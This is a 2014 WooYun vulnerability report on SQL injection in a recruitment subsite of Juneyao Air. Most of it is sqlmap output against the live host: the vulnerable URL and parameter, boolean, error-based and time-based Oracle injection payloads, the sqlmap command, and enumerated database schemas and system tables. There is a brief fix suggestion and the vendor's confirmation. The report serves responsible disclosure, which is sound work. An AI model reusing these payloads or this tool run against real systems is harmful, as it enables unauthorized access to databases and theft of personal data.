漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-058848
漏洞标题:吉祥航空某分站sql注入(可导致信息泄露)
相关厂商:juneyaoair.com
漏洞作者: 小人物Reno
提交时间:2014-04-29 10:36
修复时间:2014-06-13 10:36
公开时间:2014-06-13 10:36
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-04-29: 细节已通知厂商并且等待厂商处理中
2014-04-30: 厂商已经确认,细节仅向厂商公开
2014-05-10: 细节向核心白帽子及相关领域专家公开
2014-05-20: 细节向普通白帽子公开
2014-05-30: 细节向实习白帽子公开
2014-06-13: 细节向公众公开
简要描述:
RT..
详细说明:
注入点:http://zhaopin.juneyaoair.com:8081/Recurit/ANN.aspx?PK_ANN=2
---
Place: GET
Parameter: PK_ANN
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: PK_ANN=2' AND 1929=1929 AND 'rEJy'='rEJy
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: PK_ANN=2' AND 9075=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(116)||CHR(110)||CHR(115)||CHR(113)||(SELECT
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: PK_ANN=2' AND 4138=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5
---
[10:04:50] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[10:04:50] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names
[10:04:50] [INFO] fetching database (schema) names
[10:04:50] [INFO] the SQL query used returns 22 entries
漏洞证明:
Place: GET
Parameter: PK_ANN
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: PK_ANN=2' AND 1929=1929 AND 'rEJy'='rEJy
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: PK_ANN=2' AND 9075=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(116)||CHR(110)||CHR(115)|
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: PK_ANN=2' AND 4138=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_US
---
[10:04:50] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[10:04:50] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart
[10:04:50] [INFO] fetching database (schema) names
[10:04:50] [INFO] the SQL query used returns 22 entries
available databases [22]:
[*] APEX_030200
[*] APPQOSSYS
[*] COMPLAIN
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] FMS
[*] IOFFICE
[*] KQ
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[10:04:50] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (h
[10:04:50] [INFO] fetched data logged to text files under 'D:\360?~1\SQLMAP~1.4\Bin\output\zhaopin.
[*] shutting down at 10:04:50
[root@Hacker~]# Sqlmap Sqlmap sqlmap -u http://zhaopin.juneyaoair.com:8081/Recurit/ANN.aspx?PK_ANN=
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal
[*] starting at 10:09:58
[10:09:58] [INFO] resuming back-end DBMS 'oracle'
[10:09:58] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: PK_ANN
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: PK_ANN=2' AND 1929=1929 AND 'rEJy'='rEJy
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: PK_ANN=2' AND 9075=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(116)||CHR(110)||CHR(115)|
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: PK_ANN=2' AND 4138=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_US
---
[10:09:58] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[10:09:58] [INFO] fetching tables for database: 'SYSTEM'
sqlmap got a 302 redirect to 'http://zhaopin.juneyaoair.com:8081/Error.aspx'. Do you want to follow
[10:10:01] [INFO] the SQL query used returns 161 entries
[10:10:02] [INFO] retrieved: LOGMNRGGC_GTLO
[10:10:02] [INFO] retrieved: LOGMNRGGC_GTCS
[10:10:03] [INFO] retrieved: LOGMNR_FILTER$
[10:10:03] [INFO] retrieved: LOGMNR_GLOBAL$
[10:10:04] [INFO] retrieved: LOGMNR_RESTART_CKPT_TXINFO$
[10:10:04] [INFO] retrieved: LOGMNR_SESSION_ACTIONS$
[10:10:05] [INFO] retrieved: LOGMNR_SESSION_EVOLVE$
[10:10:05] [INFO] retrieved: LOGSTDBY$FLASHBACK_SCN
[10:10:06] [INFO] retrieved: LOGMNR_PARAMETER$
[10:10:06] [INFO] retrieved: LOGMNR_SESSION$
[10:10:07] [INFO] retrieved: MVIEW$_ADV_WORKLOAD
[10:10:07] [INFO] retrieved: MVIEW$_ADV_BASETABLE
[10:10:07] [INFO] retrieved: MVIEW$_ADV_SQLDEPEND
[10:10:08] [INFO] retrieved: MVIEW$_ADV_PRETTY
[10:10:08] [INFO] retrieved: MVIEW$_ADV_TEMP
[10:10:09] [INFO] retrieved: MVIEW$_ADV_FILTER
[10:10:09] [INFO] retrieved: MVIEW$_ADV_LOG
[10:10:10] [INFO] retrieved: MVIEW$_ADV_FILTERINSTANCE
[10:10:10] [INFO] retrieved: MVIEW$_ADV_LEVEL
[10:10:11] [INFO] retrieved: MVIEW$_ADV_ROLLUP
[10:10:11] [INFO] retrieved: MVIEW$_ADV_AJG
[10:10:12] [INFO] retrieved: MVIEW$_ADV_FJG
[10:10:12] [INFO] retrieved: MVIEW$_ADV_GC
[10:10:13] [INFO] retrieved: MVIEW$_ADV_CLIQUE
[10:10:13] [INFO] retrieved: MVIEW$_ADV_ELIGIBLE
[10:10:14] [INFO] retrieved: MVIEW$_ADV_OUTPUT
[10:10:14] [INFO] retrieved: MVIEW$_ADV_EXCEPTIONS
[10:10:15] [INFO] retrieved: MVIEW$_ADV_PARAMETERS
[10:10:15] [INFO] retrieved: MVIEW$_ADV_INFO
[10:10:16] [INFO] retrieved: MVIEW$_ADV_JOURNAL
[10:10:16] [INFO] retrieved: MVIEW$_ADV_PLAN
[10:10:17] [INFO] retrieved: AQ$_QUEUE_TABLES
[10:10:17] [INFO] retrieved: AQ$_QUEUES
[10:10:18] [INFO] retrieved: AQ$_SCHEDULES
[10:10:18] [INFO] retrieved: AQ$_INTERNET_AGENTS
[10:10:19] [INFO] retrieved: AQ$_INTERNET_AGENT_PRIVS
[10:10:19] [INFO] retrieved: DEF$_ERROR
[10:10:20] [INFO] retrieved: DEF$_DESTINATION
[10:10:20] [INFO] retrieved: DEF$_CALLDEST
[10:10:20] [INFO] retrieved: DEF$_DEFAULTDEST
[10:10:21] [INFO] retrieved: DEF$_LOB
[10:10:21] [INFO] retrieved: DEF$_PROPAGATOR
[10:10:22] [INFO] retrieved: DEF$_ORIGIN
[10:10:22] [INFO] retrieved: DEF$_PUSHED_TRANSACTIONS
[10:10:23] [INFO] retrieved: DEF$_AQCALL
[10:10:23] [INFO] retrieved: DEF$_AQERROR
[10:10:24] [INFO] retrieved: REPCAT$_REPCAT
[10:10:24] [INFO] retrieved: REPCAT$_FLAVORS
[10:10:25] [INFO] retrieved: REPCAT$_REPSCHEMA
[10:10:25] [INFO] retrieved: REPCAT$_SNAPGROUP
[10:10:26] [INFO] retrieved: REPCAT$_REPOBJECT
[10:10:26] [INFO] retrieved: REPCAT$_REPCOLUMN
[10:10:27] [INFO] retrieved: REPCAT$_KEY_COLUMNS
[10:10:27] [INFO] retrieved: REPCAT$_GENERATED
[10:10:28] [INFO] retrieved: REPCAT$_REPPROP
[10:10:28] [INFO] retrieved: REPCAT$_REPCATLOG
[10:10:29] [INFO] retrieved: REPCAT$_DDL
[10:10:29] [INFO] retrieved: REPCAT$_REPGROUP_PRIVS
[10:10:30] [INFO] retrieved: REPCAT$_PRIORITY_GROUP
[10:10:30] [INFO] retrieved: REPCAT$_PRIORITY
[10:10:31] [INFO] retrieved: REPCAT$_COLUMN_GROUP
[10:10:31] [INFO] retrieved: REPCAT$_GROUPED_COLUMN
[10:10:32] [INFO] retrieved: REPCAT$_CONFLICT
[10:10:32] [INFO] retrieved: REPCAT$_RESOLUTION_METHOD
[10:10:33] [INFO] retrieved: REPCAT$_RESOLUTION
[10:10:33] [INFO] retrieved: REPCAT$_RESOLUTION_STATISTICS
[10:10:34] [INFO] retrieved: REPCAT$_RESOL_STATS_CONTROL
[10:10:34] [INFO] retrieved: REPCAT$_PARAMETER_COLUMN
[10:10:35] [INFO] retrieved: REPCAT$_AUDIT_ATTRIBUTE
[10:10:35] [INFO] retrieved: REPCAT$_AUDIT_COLUMN
[10:10:35] [INFO] retrieved: REPCAT$_FLAVOR_OBJECTS
[10:10:36] [INFO] retrieved: REPCAT$_TEMPLATE_STATUS
[10:10:36] [INFO] retrieved: REPCAT$_TEMPLATE_TYPES
[10:10:37] [INFO] retrieved: REPCAT$_REFRESH_TEMPLATES
[10:10:37] [INFO] retrieved: REPCAT$_USER_AUTHORIZATIONS
[10:10:38] [INFO] retrieved: REPCAT$_OBJECT_TYPES
[10:10:38] [INFO] retrieved: REPCAT$_TEMPLATE_REFGROUPS
[10:10:39] [INFO] retrieved: REPCAT$_TEMPLATE_OBJECTS
[10:10:39] [INFO] retrieved: REPCAT$_TEMPLATE_PARMS
[10:10:40] [INFO] retrieved: REPCAT$_OBJECT_PARMS
[10:10:40] [INFO] retrieved: REPCAT$_USER_PARM_VALUES
[10:10:41] [INFO] retrieved: REPCAT$_TEMPLATE_SITES
[10:10:41] [INFO] retrieved: REPCAT$_SITE_OBJECTS
[10:10:42] [INFO] retrieved: REPCAT$_RUNTIME_PARMS
[10:10:42] [INFO] retrieved: REPCAT$_TEMPLATE_TARGETS
[10:10:43] [INFO] retrieved: REPCAT$_EXCEPTIONS
[10:10:43] [INFO] retrieved: REPCAT$_INSTANTIATION_DDL
[10:10:44] [INFO] retrieved: REPCAT$_EXTENSION
[10:10:44] [INFO] retrieved: REPCAT$_SITES_NEW
[10:10:45] [INFO] retrieved: LOGMNR_SPILL$
[10:10:45] [INFO] retrieved: LOGSTDBY$EVENTS
[10:10:46] [INFO] retrieved: LOGMNR_UID$
[10:10:46] [INFO] retrieved: LOGMNR_LOG$
[10:10:47] [INFO] retrieved: LOGMNR_ERROR$
[10:10:47] [INFO] retrieved: LOGMNR_PROCESSED_LOG$
[10:10:48] [INFO] retrieved: LOGMNR_RESTART_CKPT$
[10:10:48] [INFO] retrieved: SCHEDULER_PROGRAM_ARGS_TBL
[10:10:49] [INFO] retrieved: SCHEDULER_JOB_ARGS_TBL
[10:10:49] [INFO] retrieved: LOGMNRC_DBNAME_UID_MAP
[10:11:19] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the
[10:11:50] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the
[10:12:21] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the
[10:13:06] [ERROR] thread MainThread: connection timed out to the target URL or proxy
Database: SYSTEM
[99 tables]
+-------------------------------+
| AQ$_INTERNET_AGENTS |
| AQ$_INTERNET_AGENT_PRIVS |
| AQ$_QUEUES |
| AQ$_QUEUE_TABLES |
| AQ$_SCHEDULES |
| DEF$_AQCALL |
| DEF$_AQERROR |
| DEF$_CALLDEST |
| DEF$_DEFAULTDEST |
| DEF$_DESTINATION |
| DEF$_ERROR |
| DEF$_LOB |
| DEF$_ORIGIN |
| DEF$_PROPAGATOR |
| DEF$_PUSHED_TRANSACTIONS |
| LOGMNRC_DBNAME_UID_MAP |
| LOGMNRGGC_GTCS |
| LOGMNRGGC_GTLO |
| LOGMNR_ERROR$ |
| LOGMNR_FILTER$ |
| LOGMNR_GLOBAL$ |
| LOGMNR_LOG$ |
| LOGMNR_PARAMETER$ |
| LOGMNR_PROCESSED_LOG$ |
| LOGMNR_RESTART_CKPT$ |
| LOGMNR_RESTART_CKPT_TXINFO$ |
| LOGMNR_SESSION$ |
| LOGMNR_SESSION_ACTIONS$ |
| LOGMNR_SESSION_EVOLVE$ |
| LOGMNR_SPILL$ |
| LOGMNR_UID$ |
| LOGSTDBY$EVENTS |
| LOGSTDBY$FLASHBACK_SCN |
| MVIEW$_ADV_AJG |
| MVIEW$_ADV_BASETABLE |
| MVIEW$_ADV_CLIQUE |
| MVIEW$_ADV_ELIGIBLE |
| MVIEW$_ADV_EXCEPTIONS |
| MVIEW$_ADV_FILTER |
| MVIEW$_ADV_FILTERINSTANCE |
| MVIEW$_ADV_FJG |
| MVIEW$_ADV_GC |
| MVIEW$_ADV_INFO |
| MVIEW$_ADV_JOURNAL |
| MVIEW$_ADV_LEVEL |
| MVIEW$_ADV_LOG |
| MVIEW$_ADV_OUTPUT |
| MVIEW$_ADV_PARAMETERS |
| MVIEW$_ADV_PLAN |
| MVIEW$_ADV_PRETTY |
| MVIEW$_ADV_ROLLUP |
| MVIEW$_ADV_SQLDEPEND |
| MVIEW$_ADV_TEMP |
| MVIEW$_ADV_WORKLOAD |
| REPCAT$_AUDIT_ATTRIBUTE |
| REPCAT$_AUDIT_COLUMN |
| REPCAT$_COLUMN_GROUP |
| REPCAT$_CONFLICT |
| REPCAT$_DDL |
| REPCAT$_EXCEPTIONS |
| REPCAT$_EXTENSION |
| REPCAT$_FLAVORS |
| REPCAT$_FLAVOR_OBJECTS |
| REPCAT$_GENERATED |
| REPCAT$_GROUPED_COLUMN |
| REPCAT$_INSTANTIATION_DDL |
| REPCAT$_KEY_COLUMNS |
| REPCAT$_OBJECT_PARMS |
| REPCAT$_OBJECT_TYPES |
| REPCAT$_PARAMETER_COLUMN |
| REPCAT$_PRIORITY |
| REPCAT$_PRIORITY_GROUP |
| REPCAT$_REFRESH_TEMPLATES |
| REPCAT$_REPCAT |
| REPCAT$_REPCATLOG |
| REPCAT$_REPCOLUMN |
| REPCAT$_REPGROUP_PRIVS |
| REPCAT$_REPOBJECT |
| REPCAT$_REPPROP |
| REPCAT$_REPSCHEMA |
| REPCAT$_RESOLUTION |
| REPCAT$_RESOLUTION_METHOD |
| REPCAT$_RESOLUTION_STATISTICS |
| REPCAT$_RESOL_STATS_CONTROL |
| REPCAT$_RUNTIME_PARMS |
| REPCAT$_SITES_NEW |
| REPCAT$_SITE_OBJECTS |
| REPCAT$_SNAPGROUP |
| REPCAT$_TEMPLATE_OBJECTS |
| REPCAT$_TEMPLATE_PARMS |
| REPCAT$_TEMPLATE_REFGROUPS |
| REPCAT$_TEMPLATE_SITES |
| REPCAT$_TEMPLATE_STATUS |
| REPCAT$_TEMPLATE_TARGETS |
| REPCAT$_TEMPLATE_TYPES |
| REPCAT$_USER_AUTHORIZATIONS |
| REPCAT$_USER_PARM_VALUES |
| SCHEDULER_JOB_ARGS_TBL |
| SCHEDULER_PROGRAM_ARGS_TBL |
+-------------------------------+
目测上万用户信息泄露。。。。未深入。
修复方案:
过滤参数!
版权声明:转载请注明来源 小人物Reno@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2014-04-30 10:21
厂商回复:
漏洞已经修复
最新状态:
暂无